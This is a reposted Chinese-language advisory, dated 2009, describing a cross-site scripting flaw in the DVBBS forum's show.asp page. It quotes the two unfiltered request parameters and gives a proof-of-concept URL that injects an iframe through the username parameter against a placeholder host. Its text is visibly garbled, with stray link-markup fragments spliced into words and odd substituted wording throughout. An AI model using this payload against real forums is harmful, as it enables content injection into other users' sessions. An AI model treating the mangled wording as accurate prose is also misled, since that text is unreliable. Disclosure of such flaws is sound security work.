日期:2009-05-28 13:41:00 来源:本站整理
动网论坛(DVBBS)Show.asp页面过滤不严招致跨站漏洞[网络技术]
本文“动网论坛(DVBBS)Show.asp页面过滤不严招致跨站漏洞[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
hackdos.com/" target=_blank>程序介绍:
动 网论坛做为动网主要服务产品之一,自2001年投入奉行并运营以来,得到了国内外广大互联网用户的遍及好评和支持.做为国内第一的互联网论坛服务品牌,占 据了国内论坛服务市场的70%以上的用户,动网论坛服务在一些如片子、hackdos.com/" target=_blank>下载、网游等热门网站的占据率乃至高达80%以上,是中国论坛服务范畴事实上的标 准.
hackdos.com/" target=_blank>漏洞解析:
文件show.asp中:
filetype=Request("filetype") //第75行
username=Request("username")
……
TempStr = Replace(TempStr,"{$username}",UserName) //第244行
hackdos.com/" target=_blank>程序关于输出变量filetype和username过滤招致xsshackdos.com/" target=_blank>漏洞的产生.
hackdos.com/" target=_blank>漏洞操纵:http://www.target.com/show.asp?filetype=xxx&;username=nnn<iframe%20src=http://www.百度.com></iframe>
办理筹划:
厂商补钉
DVBBS
----------
目前厂商还没有供应补钉大概进级hackdos.com/" target=_blank>程序,我们倡议利用此hackdos.com/" target=_blank>软件的用户随时关注厂商的主页以获得最新版本:
http://www.dvbbs.net
以上是“动网论坛(DVBBS)Show.asp页面过滤不严招致跨站漏洞[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
| 本文地址: | 与您的QQ/BBS好友分享! |
- 好的评价 如果您觉得此文章好,就请您
0%(0) 
- 差的评价 如果您觉得此文章差,就请您
0%(0) 
中查找“动网论坛(DVBBS)Show.asp页面过滤不严招致跨站漏洞”更多相关内容
中查找“动网论坛(DVBBS)Show.asp页面过滤不严招致跨站漏洞”更多相关内容评论内容只代表网友观点,与本站立场无关!
评论摘要(共 0 条,得分 0 分,平均 0 分)
查看完整评论